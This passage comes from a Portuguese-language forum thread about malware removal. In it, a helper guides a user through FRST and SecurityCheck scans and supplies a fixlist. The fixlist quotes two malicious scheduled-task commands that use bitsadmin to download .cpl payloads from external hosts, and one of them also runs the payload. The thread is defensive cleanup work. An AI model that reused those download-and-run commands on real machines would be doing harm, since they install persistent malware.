    2017-06-12 19:48 - 2017-06-12 19:48 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITEE1F.tmp
    2017-07-26 20:20 - 2017-07-26 20:20 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITEE6A.tmp
    2017-08-22 19:51 - 2017-08-22 19:51 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITEEBC.tmp
    2017-09-05 20:33 - 2017-09-05 20:33 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITEF36.tmp
    2017-09-11 21:43 - 2017-09-11 21:43 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITEF68.tmp
    2017-08-30 20:56 - 2017-08-30 20:56 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITEFA6.tmp
    2017-06-21 19:46 - 2017-06-21 19:46 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITF109.tmp
    2017-09-02 13:00 - 2017-09-02 13:00 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITF161.tmp
    2017-09-13 20:07 - 2017-09-13 20:07 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITF482.tmp
    2017-07-15 14:41 - 2017-07-15 14:41 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITF510.tmp
    2014-12-10 19:31 - 2014-12-10 19:31 - 000000017 _____ () C:\Users\A\AppData\Local\resmon.resmoncfg
    2016-06-02 06:54 - 2016-06-02 06:54 - 000000057 _____ () C:\ProgramData\Ament.ini

    Alguns arquivos em TEMP:
    ====================
    2017-09-19 19:19 - 2013-08-28 23:16 - 001732032 _____ (Microsoft Corporation) C:\Users\A\AppData\Local\Temp\dllnt_dump.dll

    ==================== Bamital & volsnap ======================

    (Não há correção automática para arquivos que não passaram na verificação.)

    C:\Windows\system32\winlogon.exe => O arquivo é assinado digitalmente
    C:\Windows\system32\wininit.exe => O arquivo é assinado digitalmente
    C:\Windows\SysWOW64\wininit.exe => O arquivo é assinado digitalmente
    C:\Windows\explorer.exe => O arquivo é assinado digitalmente
    C:\Windows\SysWOW64\explorer.exe => O arquivo é assinado digitalmente
    C:\Windows\system32\svchost.exe => O arquivo é assinado digitalmente
    C:\Windows\SysWOW64\svchost.exe => O arquivo é assinado digitalmente
    C:\Windows\system32\services.exe => O arquivo é assinado digitalmente
    C:\Windows\system32\User32.dll => O arquivo é assinado digitalmente
    C:\Windows\SysWOW64\User32.dll => O arquivo é assinado digitalmente
    C:\Windows\system32\userinit.exe => O arquivo é assinado digitalmente
    C:\Windows\SysWOW64\userinit.exe => O arquivo é assinado digitalmente
    C:\Windows\system32\rpcss.dll => O arquivo é assinado digitalmente
    C:\Windows\system32\dnsapi.dll => O arquivo é assinado digitalmente
    C:\Windows\SysWOW64\dnsapi.dll => O arquivo é assinado digitalmente
    C:\Windows\system32\Drivers\volsnap.sys => O arquivo é assinado digitalmente

    LastRegBack: 2017-09-20 03:01

    ==================== Fim de FRST.txt ============================

    Addition.txt

    Compartilhar este post


    Link para o post
    Compartilhar em outros sites

    @Murilo Beraldo

     

    Desative temporariamente seu antivírus, antispywares e firewall, para não causar conflitos.

    Abra o seu Bloco de Notas, copie (control + c) e cole (control + v) todo o texto que está no CODE abaixo:

    CreateRestorePoint:
    CloseProcesses:
    Task: {7EE04748-D3B9-4738-8B01-EBCA8E40CFF8} - System32\Tasks\NativeUI => cmd /c IF NOT EXIST C:\Users\A\AppData\Roaming\Microsoft\Native.sys (BITSADMIN /Transfer My /Download /Priority HIGH hxxp://www.dicasimpressao.esy.es/FE-1.0.0.0/Control.cpl C:\Users\A\AppData\Roaming\Microsoft\Control.cpl) <==== ATENÇÃO
    Task: {FD79789C-CD4B-4AC8-87B8-00FCDAAD474F} - System32\Tasks\Windows Antivirus Protect => cmd /c bitsadmin /transfer My /Download /Priority HIGH hxxp://www.celgogo.com.br/system/FE-1.0.0.0/antivirusUI.cpl C:\Users\A\AppData\Roaming\Microsoft\AntivirusUI.cpl & C:\Users\A\AppData\Roaming\Microsoft\AntivirusUI.cpl <==== ATENÇÃO
    AlternateDataStreams: C:\ProgramData:961CD860F779A42E [1]
    AlternateDataStreams: C:\Users\All Users:961CD860F779A42E [1]
    AlternateDataStreams: C:\Users\Todos os Usuários:961CD860F779A42E [1]
    AlternateDataStreams: C:\ProgramData\Application Data:961CD860F779A42E [1]
    AlternateDataStreams: C:\ProgramData\Dados de aplicativos:961CD860F779A42E [1]
    AlternateDataStreams: C:\Users\Todos os Usuários\Application Data:961CD860F779A42E [1]
    AlternateDataStreams: C:\Users\Todos os Usuários\Dados de aplicativos:961CD860F779A42E [1]
    CMD: ipconfig /flushdns
    RemoveProxy:
    EmptyTemp:
    CreateRestorePoint:

    Salve este arquivo na na sua área de trabalho com o nome fixlist

    OBS: É de extrema importância que o arquivo "fixlist" seja salvo na sua Área de Trabalho/Desktop. Verifique também se o FRST.exe encontra-se na Área de Trabalho/Desktop.

    ** Usuários do Windows Vista, Windows 7, 8/8.1 e windows 10:
    Clique com o direito sobre o arquivo FRST.EXE, depois clique em VRIfczU.png.

    Clique no botão Fix.

    Aguarde e ao final, o log Fixlog.txt será salvo no seu desktop.

    Anexe o log na sua próxima resposta

    Compartilhar este post


    Link para o post
    Compartilhar em outros sites
  • Autor do tópico
  • EDIT: Tinha esquecido de desabilitar o antivirus e firewall, aqui está o novo log

    Fixlog.txt

    Editado por Murilo Beraldo

    Compartilhar este post


    Link para o post
    Compartilhar em outros sites

    @Murilo Beraldo

     

    Pressione as teclas Windows tecla-windows.gif + R e digite: msconfig
     
    - Clique na guia Serviços, marque a opção Ocultar todos os serviços Microsoft e depois clique em Desativar tudo
    - Clique na guia Inicialização de Programas e clique em Desativar tudo
     
    Siga as mensagens ate que seja solicitado a reiniciar.

    Após isso me informe se os problemas em relação a malwares ainda persistem.

    Compartilhar este post


    Link para o post
    Compartilhar em outros sites
  • Autor do tópico
  • Olha, ao que me parece, resolveu! Vou testar hoje a noite o pc por mais tempo e te dou uma certeza.

     

    E obrigado!

    Editado por Murilo Beraldo

    Compartilhar este post


    Link para o post
    Compartilhar em outros sites

    @Murilo Beraldo

     

    Ok. No aguardo.

     

    Enquanto isso execute o procedimento abaixo.

     

    Baixe Security Check by glax24 de um dos links abaixo, e salve-o em seu Desktop.
    http://safezone.cc/resources/security-check-by-glax24.25/download?version=631
    Clique duas vezes sobre o arquivo SecurityCheck.exe

    1. ** Usuários do Windows Vista, 7, 8/8.1 e windows 10:
      Clique com o direito sobre o arquivo SecurityCheck.exe, depois clique em VRIfczU.png
    2. Aguarde enquanto a ferramenta faz o exame;
    3. Ao final salve log como SecurityCheck.html;
    4. Abra o arquivo com o bloco de notas;
    5. Selecione, copie e cole o conteúdo deste log em sua sua próxima resposta.

    Compartilhar este post


    Link para o post
    Compartilhar em outros sites
  • Autor do tópico
  • Aqui o log.

     

    Ainda estou usando o pc pra ver se aparece alguma coisa. Até agora não :D

     

    Mas segue alguns printscreens dos programas que não sei o que são.

    Esse PopDeals obviamente é alguma coisa ruim XD. Não existe no local indicado, mas ainda consta na lista de programas querendo iniciar com o windows. Me preocupei mais com ele.

     

    SecurityCheck by glax24 & Severnyj v.1.4.0.52 [25.07.17]
    WebSite: www.safezone.cc
    DateLog: 25.09.2017 19:40:21
    Path starting: C:\Users\A\AppData\Local\Temp\SecurityCheck\SecurityCheck.exe
    Log directory: C:\SecurityCheck\
    IsAdmin: True
    User: A
    VersionXML: 4.64is-23.09.2017
    ___________________________________________________________________________

    Windows 7(6.1.7601) Service Pack 1 (x64) Professional Lang: Portuguese(0416)
    Installation date OS: 04.07.2014 10:55:35
    LicenseStatus: Windows(R) 7, Professional edition The machine is permanently activated.
    Boot Mode: Normal
    Default Browser: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    SystemDrive: C: FS: [NTFS] Capacity: [111.7 Gb] Used: [78 Gb] Free: [33.7 Gb]
    ------------------------------- [ Windows ] -------------------------------
    Internet Explorer 11.0.9600.17501 Warning! Download Update
    Online installation. Last version available when Windows update is enabled throught the Internet.
    User Account Control enabled
    Notify before download
    Date install updates: 2015-01-28 05:33:05
    Windows Update (wuauserv) - The service is running
    Central de Segurança (wscsvc) - The service is running
    Registro remoto (RemoteRegistry) - The service has stopped
    Descoberta SSDP (SSDPSRV) - The service is running
    Serviços de Área de Trabalho Remota (TermService) - The service has stopped
    Windows Remote Management (WS-Management) (WinRM) - The service has stopped
    ------------------------------ [ MS Office ] ------------------------------
    Microsoft Office 2007 v.12.0.4518.1014
    ---------------------------- [ Antivirus_WMI ] ----------------------------
    Malwarebytes (disabled and up to date)
    --------------------------- [ FirewallWindows ] ---------------------------
    Firewall do Windows (MpsSvc) - The service is running
    --------------------------- [ AntiSpyware_WMI ] ---------------------------
    Malwarebytes (disabled and up to date)
    Windows Defender (enabled and up to date)
    ---------------------- [ AntiVirusFirewallInstall ] -----------------------
    ESET Online Scanner v3
    -------------------------- [ SecurityUtilities ] --------------------------
    Malwarebytes versão 3.2.2.2029 v.3.2.2.2029
    --------------------------- [ OtherUtilities ] ----------------------------
    WinRAR 5.01 (64-bit) v.5.01.0 Warning! Download Update
    Microsoft Silverlight v.5.1.30514.0 Warning! Download Update
    VLC media player v.2.1.5 Warning! Download Update
    --------------------------------- [ IM ] ----------------------------------
    Skype™ 7.30 v.7.30.105 Warning! Download Update
    -------------------------------- [ Java ] ---------------------------------
    Java 8 Update 31 v.8.0.310 Warning! Download Update
    Uninstall old version and install new one (jre-8u144-windows-i586.exe).
    Java SE Development Kit 7 Update 55 v.1.7.0.550 Warning! This software is no longer supported. Please uninstall it and use Java SDK 8 (jdk-8u144-windows-i586.exe).
    --------------------------- [ AdobeProduction ] ---------------------------
    Adobe Flash Player 27 ActiveX v.27.0.0.130
    Adobe Flash Player 27 NPAPI v.27.0.0.130
    Adobe AIR v.3.2.0.2070 Warning! Download Update
    Adobe Acrobat DC v.17.012.20098
    ------------------------------- [ Browser ] -------------------------------
    Google Chrome v.60.0.3112.113 Warning! Download Update
    Mozilla Firefox 38.0.5 (x86 pt-BR) v.38.0.5 Warning! Download Update
    --------------------------- [ RunningProcess ] ----------------------------
    C:\Program Files (x86)\Google\Chrome\Application\chrome.exe v.60.0.3112.113
    ------------------ [ AntivirusFirewallProcessServices ] -------------------
    Malwarebytes Service (MBAMService) - The service has stopped
    Windows Defender (WinDefend) - The service is running
    ---------------------------- [ UnwantedApps ] -----------------------------
    Skype Click to Call v.8.5.0.9167 Warning! Browser's toolbar. It can slow down the working of your browser and have violation privacy problems.
    ----------------------------- [ End of Log ] ------------------------------
     

     

    Programas.png

    Serviço1.png

    Editado por Murilo Beraldo

    Compartilhar este post


    Link para o post
    Compartilhar em outros sites
    Visitante
    Este tópico está impedido de receber novos posts.





    Sobre o Clube do Hardware

    No ar desde 1996, o Clube do Hardware é uma das maiores, mais antigas e mais respeitadas publicações sobre tecnologia do Brasil. Leia mais

    Direitos autorais

    Não permitimos a cópia ou reprodução do conteúdo do nosso site, fórum, newsletters e redes sociais, mesmo citando-se a fonte. Leia mais

    ×